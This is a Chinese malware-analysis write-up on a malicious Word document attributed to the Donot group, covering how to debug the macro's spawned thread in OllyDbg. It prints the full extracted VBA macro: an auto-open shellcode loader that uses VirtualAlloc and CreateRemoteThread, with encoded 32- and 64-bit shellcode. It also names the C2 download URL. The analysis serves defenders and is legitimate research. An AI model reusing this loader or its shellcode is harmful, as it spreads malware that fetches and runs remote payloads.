OD 调试宏代码中的新线程

donot - fees_10_to_12-copy.doc - 7a6559ff13f2aecd89c64c1704a68588
- 基本信息
- 样本分析
  - donot - fees_10_to_12-copy.doc
  - New Thread

作者：Yenn_
原文链接： https://0xdf1001f.github.io/2021/02/23/OD%E8%B0%83%E8%AF%95%E5%AE%8F%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E6%96%B0%E7%BA%BF%E7%A8%8B/

donot - fees_10_to_12-copy.doc - 7a6559ff13f2aecd89c64c1704a68588

基本信息

File Name	File Size	File Type	MD5
fees_10_to_12-copy.doc	46,119 Bytes	Downloader	7a6559ff13f2aecd89c64c1704a68588

样本是一个带有宏代码的.doc文档，文档内无诱饵内容，代码部分被加密

样本分析

donot - fees_10_to_12-copy.doc

将宏代码提取后：

#If VBA7 Then
    Private Declare PtrSafe Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As LongPtr, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
    Private Declare PtrSafe Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
    Private Declare PtrSafe Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
    Private Declare Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As Long, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
    Private Declare Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
    Private Declare Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#End If

Sub iIljILiiJILLlljL()
    Dim jLlJLiiLjliLIIiL As Variant, ILlIjjlLJJJJlJIJ As Variant, IiJlLIlJIjIJJIiI As Variant, JlLiLJjLjiJlllIi As Long
    #If VBA7 Then
        Dim iIJIllLIliILJIll As LongPtr, jJjjJILLLJjijjjj As LongPtr, lljIJiiiIIjJjiIj As LongPtr
    #Else
        Dim iIJIllLIliILJIll As Long, jJjjJILLLJjijjjj As Long, lljIJiiiIIjJjiIj As Long
    #End If

    jLlJLiiLjliLIIiL = Array(137, 255, 85, 137, 229, 85, 131, 236, 64, 217, 235, 155, 217, 116, 36, 244, 93, 131, 237, 9, 141, 77, 37, 186, 188, 3, 0, 0, 246, 17, 128, 49, 253, 65, 74, 117, 247, 51, 203, 186, 50, 2, 2, 2, 102, 137, 54, 3, 137, 116, 14, 137, 116, 30, 137, 92, 10, 137, 124, 34, 137, 52, 130, 125, 12, 48, 119, 240, 139, 220, 235, 133, 2, 2, 2, 98, 139, 255, 139, 241, 84, 137, 113, 62, 137, 118, 28, 122, 3, 220, 84, 137, 116, 34, 3, 220, 51, 203, 75, 131, 119, 2, 209, 194, 175, 184, 67, 175, 3, 218, 84, 51, 244, 13, 188, 18, 58, 212, 118, 10, 195, 204, 5, 3, 212, 66, 233, 243, 59, 119, 2, 92, 119, 230, 88, 139, 221, 137, 88, 38, 3, 249, 100, 137, 14, 73, 137, 88, 30, 3, 249, 137, 6, 137, 3, 250, 139, 71, 2, 92, 129, 199, 6, 129, 127, 2, 2, 119, 167, 99, 193, 130, 58, 234, 118, 13, 130, 58, 235, 118, 8, 130, 58, 206, 118, 7, 130, 58, 233, 119, 19, 131, 122, 7, 146, 146, 146, 146, 118, 10, 139, _
                        253, 87, 139, 231, 143, 66, 7, 253, 226, 104, 2, 104, 2, 139, 229, 197, 5, 182, 155, 113, 166, 234, 106, 253, 253, 253, 104, 66, 106, 2, 50, 2, 2, 106, 2, 2, 82, 2, 104, 2, 253, 21, 129, 198, 10, 139, 197, 197, 69, 6, 227, 182, 62, 180, 197, 69, 10, 146, 124, 3, 99, 197, 69, 38, 53, 233, 59, 125, 197, 69, 34, 60, 109, 80, 12, 197, 69, 42, 61, 95, 240, 28, 197, 69, 26, 129, 23, 52, 115, 197, 69, 14, 66, 240, 75, 44, 197, 69, 18, 232, 32, 210, 59, 197, 69, 22, 21, 79, 176, 204, 197, 69, 30, 134, 164, 162, 71, 197, 69, 46, 128, 237, 13, 185, 197, 69, 50, 94, 48, 183, 217, 197, 69, 54, 74, 69, 36, 93, 197, 69, 58, 131, 60, 8, 98, 197, 69, 62, 127, 219, 196, 49, 197, 69, 66, 104, 181, 10, 187, 197, 69, 70, 99, 244, 160, 171, 197, 69, 74, 220, 177, 180, 69, 197, 5, 182, 155, 113, 166, 197, 69, 78, 158, 120, 242, 113, 197, 69, 82, 35, 243, 227, 141, 197, 69, 86, 168, 77, 99, 216, _
                        234, 183, 252, 253, 253, 234, 43, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 73, 103, 112, 108, 103, 110, 49, 48, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 106, 109, 108, 2, 2, 106, 119, 112, 110, 111, 143, 6, 38, 82, 253, 85, 6, 129, 198, 10, 139, 196, 197, 69, 98, 81, 20, 0, 34, 197, 69, 102, 161, 125, 107, 231, 85, 143, 125, 98, 234, 85, 252, 253, 253, 93, 234, 37, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 87, 112, 110, 111, 109, 108, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 51, 194, 143, 143, 99, 1, 2, 2, 143, 93, 110, 82, 82, 104, 125, 81, 83, 82, 253, 85, 102, 129, 250, 2, 13, 135, 246, 2, 2, 2, 234, 45, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 81, 103, 97, 109, 108, _
                        102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 2, 253, 85, 82, 51, 194, 82, 104, 3, 104, 1, 82, 104, 3, 106, 2, 2, 2, 130, 81, 253, 85, 14, 82, 143, 157, 238, 2, 2, 2, 104, 2, 143, 22, 38, 104, 2, 80, 106, 2, 82, 2, 2, 81, 82, 253, 85, 70, 129, 198, 6, 90, 82, 253, 85, 30, 139, 220, 244, 20, 130, 52, 60, 68, 131, 60, 90, 137, 135, 59, 119, 240, 130, 57, 146, 118, 66, 130, 57, 206, 118, 57, 130, 57, 139, 118, 52, 234, 46, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 233, 54, 234, 40, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, _
                        81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 253, 225, 234, 31, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 71, 122, 107, 118, 107, 108, 101, 34, 86, 106, 112, 103, 99, 102, 44, 2, 253, 85, 82, 129, 198, 62, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 107, 97, 109, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)
    ILlIjjlLJJJJlJIJ = Array(144, 85, 72, 137, 229, 85, 72, 129, 236, 128, 0, 0, 0, 232, 0, 0, 0, 0, 93, 72, 131, 237, 18, 72, 141, 77, 47, 72, 199, 194, 76, 4, 0, 0, 246, 17, 128, 49, 253, 72, 255, 193, 72, 255, 202, 117, 243, 103, 78, 137, 6, 39, 98, 2, 2, 2, 79, 137, 66, 26, 79, 143, 98, 18, 79, 137, 6, 38, 254, 75, 137, 122, 98, 136, 69, 12, 62, 48, 118, 10, 79, 137, 2, 79, 59, 226, 119, 239, 75, 137, 114, 50, 233, 125, 83, 80, 81, 87, 84, 85, 74, 139, 255, 74, 139, 241, 84, 137, 113, 62, 137, 182, 28, 138, 2, 2, 2, 74, 3, 220, 84, 137, 116, 34, 74, 3, 220, 74, 51, 203, 74, 253, 203, 131, 119, 2, 209, 194, 175, 184, 253, 195, 175, 74, 3, 218, 84, 74, 51, 244, 13, 188, 18, 58, 212, 118, 8, 195, 204, 5, 3, 212, 74, 253, 194, 233, 237, 59, 119, 2, 92, 119, 221, 88, 74, 139, 221, 137, 88, 38, 74, 3, 249, 100, 137, 14, 73, 137, 88, 30, 74, 3, 249, 137, 6, 137, 74, 3, 250, 74, 139, _
                        71, 2, 92, 74, 129, 199, 10, 129, 127, 2, 2, 119, 147, 93, 92, 95, 89, 88, 91, 193, 104, 2, 104, 2, 74, 139, 229, 197, 5, 182, 155, 113, 166, 234, 109, 253, 253, 253, 74, 129, 238, 34, 74, 197, 195, 2, 2, 2, 2, 74, 197, 192, 2, 2, 82, 2, 75, 197, 194, 2, 50, 2, 2, 75, 197, 195, 66, 2, 2, 2, 253, 21, 74, 129, 198, 34, 74, 129, 198, 18, 74, 139, 197, 197, 5, 182, 155, 113, 166, 197, 69, 10, 227, 182, 62, 180, 197, 69, 18, 207, 102, 203, 87, 197, 69, 26, 66, 240, 75, 44, 197, 69, 34, 134, 164, 162, 71, 197, 69, 42, 94, 48, 183, 217, 197, 69, 50, 99, 244, 160, 171, 197, 69, 58, 35, 243, 227, 141, 234, 4, 253, 253, 253, 74, 137, 13, 74, 137, 93, 10, 74, 59, 219, 126, 7, 74, 43, 219, 233, 4, 74, 43, 219, 74, 245, 211, 74, 131, 251, 2, 50, 5, 2, 126, 110, 74, 51, 194, 74, 253, 194, 100, 131, 62, 1, 2, 193, 119, 247, 74, 129, 194, 6, 74, 137, 30, 1, 100, 129, 225, _
                        2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 66, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 197, 1, 2, 2, 2, 2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 34, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 74, 186, 119, 112, 110, 111, 109, 108, 2, 2, 82, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 195, 253, 85, 10, 74, 129, 198, 34, 74, 129, 198, 10, 74, 139, 196, 197, 69, 74, 81, 20, 0, 34, 197, 69, 82, 161, 125, 107, 231, 85, 74, 143, 125, 74, 234, 60, 252, 253, 253, 93, 66, 130, 230, 242, 74, 143, 135, 249, 1, 2, 2, 74, 143, 93, 98, 74, 129, 238, 50, 74, 197, 195, 2, 2, 2, 2, 74, 139, 192, 75, 139, 218, 75, 197, 195, 125, 2, 2, 2, 74, 197, 70, 38, 34, 2, 2, 2, 2, 74, 197, 70, 38, 42, 2, 2, 2, _
                        2, 253, 85, 82, 74, 129, 198, 50, 74, 129, 250, 2, 13, 135, 132, 3, 2, 2, 74, 129, 238, 66, 74, 139, 219, 74, 184, 2, 2, 2, 130, 2, 2, 2, 2, 75, 197, 194, 3, 2, 2, 2, 75, 197, 195, 2, 2, 2, 2, 74, 197, 70, 38, 34, 1, 2, 2, 2, 74, 197, 70, 38, 42, 3, 2, 2, 2, 74, 197, 70, 38, 50, 2, 2, 2, 2, 253, 85, 26, 74, 129, 198, 66, 82, 74, 143, 157, 226, 2, 2, 2, 104, 2, 78, 143, 22, 38, 74, 129, 238, 50, 74, 139, 195, 74, 139, 216, 75, 197, 194, 2, 82, 2, 2, 79, 139, 211, 74, 197, 70, 38, 34, 2, 2, 2, 2, 253, 85, 50, 74, 129, 198, 50, 74, 129, 198, 10, 90, 74, 129, 238, 34, 74, 139, 195, 253, 85, 34, 74, 129, 198, 34, 66, 130, 230, 242, 74, 129, 238, 34, 233, 54, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, _
                        103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 44, 2, 74, 143, 15, 199, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 74, 139, 220, 244, 20, 130, 52, 60, 74, 253, 196, 131, 60, 90, 137, 135, 59, 119, 242, 130, 57, 146, 118, 86, 130, 57, 206, 118, 77, 130, 57, 74, 118, 72, 66, 130, 230, 242, 74, 129, 238, 34, 233, 50, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 203, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 233, 74, 66, 130, 230, 242, 74, 129, 238, 34, 233, 44, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 201, 253, 253, 253, 253, _
                        85, 58, 74, 129, 198, 34, 253, 225, 74, 131, 198, 138, 2, 2, 2, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 114, 108, 101, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)

    #If Win64 Then
        IiJlLIlJIjIJJIiI = ILlIjjlLJJJJlJIJ
    #Else
        IiJlLIlJIjIJJIiI = jLlJLiiLjliLIIiL
    #End If

    iIJIllLIliILJIll = liljJjliiJIiiilL(0, UBound(IiJlLIlJIjIJJIiI), &H1000, &H40)
    For JlLiLJjLjiJlllIi = LBound(IiJlLIlJIjIJJIiI) To UBound(IiJlLIlJIjIJJIiI)
        jJjjJILLLJjijjjj = IiJlLIlJIjIJJIiI(JlLiLJjLjiJlllIi)
        lljIJiiiIIjJjiIj = JlljIIIiILjliJJj(iIJIllLIliILJIll + JlLiLJjLjiJlllIi, jJjjJILLLJjijjjj, 1)
    Next JlLiLJjLjiJlllIi
    lljIJiiiIIjJjiIj = JiJJJJLjIiLiliLl(-1, 0, 0, iIJIllLIliILJIll, 0, 0, 0);创建新线程

End Sub

Sub AutooPEN()
    iIljILiiJILLlljL
End Sub
Sub WOrkBook_OPen()
    iIljILiiJILLlljL
End Sub

通过阅读宏代码，得知样本的大意为硬编码的数据，解密出一段Shellcode并在自身中创建新线程执行。

在创建线程的地方下断，“iIJIllLIliILJIll”为新线程函数地址，通过调试得到这次的内存地址为”322371584”，转为HEX为”1337 0000”

通过阅读宏代码，得知样本的大意为硬编码的数据，解密出一段Shellcode并在自身中创建新线程执行。

在创建线程的地方下断，“iIJIllLIliILJIll”为新线程函数地址，通过调试得到这次的内存地址为”322371584”，转为HEX为”1337 0000”。

这里创建新线程后，代码进入了新线程内，Office内的调试器不能调试，OD忽略所有异常然后附加进程”WINWORD.exe”,跳转前面的函数地址，来到写入的Shellcode地址，修改EIP到代码起始位置，开始调试。

New Thread

解密算法：

解密获取到VirtualAlloc的地址并调用，申请一块内存，通过硬编码写入数据，再次解密出需要使用的函数地址。

尝试从C2地址下载文件”http://cachepage.icu/queen/PLK5uovTqDpkBkGHn364mqgVAF950dhN.ico"

截至分析时，下载的文件已失效

Paper 本文由 Seebug Paper 发布，如需转载请注明来源。本文地址：https://paper.seebug.org/1508/